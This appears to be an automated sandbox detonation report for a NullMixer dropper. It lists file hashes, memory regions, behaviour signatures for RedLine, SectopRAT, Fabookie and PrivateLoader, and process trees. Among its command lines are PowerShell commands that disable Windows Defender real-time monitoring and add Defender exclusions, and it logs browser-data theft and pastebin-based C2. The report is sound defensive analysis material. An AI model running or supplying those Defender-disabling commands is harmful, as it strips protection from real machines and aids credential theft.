C:\Users\Admin\AppData\Local\Temp\is-O3K3C.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe
| MD5 | c1bc0cca3a8784bbc7d5d3e9e47e6ba4 |
| SHA1 | 500970243e0e1dd57e2aad4f372da395d639b4a3 |
| SHA256 | 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1 |
| SHA512 | 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5 |
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe
| MD5 | a4bf9671a96119f7081621c2f2e8807d |
| SHA1 | 47f50ae20bfa8b277f8c8c1963613d3f4c364b94 |
| SHA256 | d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7 |
| SHA512 | f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cd42a7c874e44.exe
| MD5 | 0c4602580c43df3321e55647c7c7dfdb |
| SHA1 | 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1 |
| SHA256 | fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752 |
| SHA512 | 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11 |
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
memory/1964-121-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe
| MD5 | c90e5a77dd1e7e03d51988bdb057bd9f |
| SHA1 | 498bd4b07d9e11133943e63c2cf06e28d9e99fc5 |
| SHA256 | cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54 |
| SHA512 | bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34 |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe
| MD5 | bf2f6094ceaa5016d7fb5e9e95059b6b |
| SHA1 | 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad |
| SHA256 | 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12 |
| SHA512 | 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78 |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe
| MD5 | 8b6f3a6e8d9797093a78f0b85da4a1fc |
| SHA1 | 2f8346a3ec3427c5a7681d166501f8f42f620b3b |
| SHA256 | 5f465c9a74f35fef4a66cbf336dc90bed8bc8caf7b51a98cb52406942c05a0e8 |
| SHA512 | c0ad94faa01f5f3fd67a90df327bd0862243c1f335ccf2582f92867f3c751dfdaf73b7e2d86bd494ca1cc8ba199db7964d61493cd37855a35acbfe0256d2f7ef |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe
| MD5 | 21a61f35d0a76d0c710ba355f3054c34 |
| SHA1 | 910c52f268dbbb80937c44f8471e39a461ebe1fe |
| SHA256 | d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd |
| SHA512 | 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e |
memory/2796-208-0x0000000000750000-0x0000000000756000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe
| MD5 | a2326dff5589a00ed3fd40bc1bd0f037 |
| SHA1 | 66c3727fb030f5e1d931de28374cf20e4693bbf4 |
| SHA256 | 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c |
| SHA512 | fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826 |
C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe
| MD5 | 0b67130e7f04d08c78cb659f54b20432 |
| SHA1 | 669426ae83c4a8eacf207c7825168aca30a37ca2 |
| SHA256 | bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac |
| SHA512 | 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79 |
memory/844-209-0x0000000000400000-0x0000000002F02000-memory.dmp
memory/2072-225-0x00000000026D0000-0x00000000028C0000-memory.dmp
memory/2752-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2752-83-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2752-82-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2752-81-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2752-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2752-69-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/1704-236-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2536-251-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2536-249-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2536-248-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2536-247-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2536-245-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2536-243-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2536-241-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1704-238-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1704-235-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2752-260-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2752-259-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2752-258-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2752-256-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2752-253-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2752-252-0x0000000000400000-0x000000000051C000-memory.dmp
memory/1704-234-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1704-232-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1704-230-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1704-228-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1704-226-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1544-270-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1544-273-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1544-271-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1544-269-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1544-267-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1544-265-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1544-263-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2260-287-0x0000000000400000-0x00000000016FB000-memory.dmp
memory/2352-289-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1092-288-0x0000000000400000-0x0000000002F22000-memory.dmp
memory/2328-290-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2072-297-0x0000000002BD0000-0x0000000002C75000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab620D.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe
"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe"
C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe
"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe" -u
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
72s
Max time network
152s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-GPT0L.tmp\Wed067fa7edd4b875a.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2864 set thread context of 4232 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe |
| PID 1628 set thread context of 4172 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GPT0L.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0639114ac9fa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe
Wed06d8092a5ae.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe
Wed068cfd71e196da.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe
Wed067fa7edd4b875a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe
Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0639114ac9fa.exe
Wed0639114ac9fa.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe
Wed062a0488e6dd1.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06384ea2548.exe
Wed06384ea2548.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe
Wed067ba5199af5f.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3036 -ip 3036
C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp" /SL5="$40210,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe
Wed062272ee8a02b1746.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 588
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe
Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe
Wed0625413f2fb.exe
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe
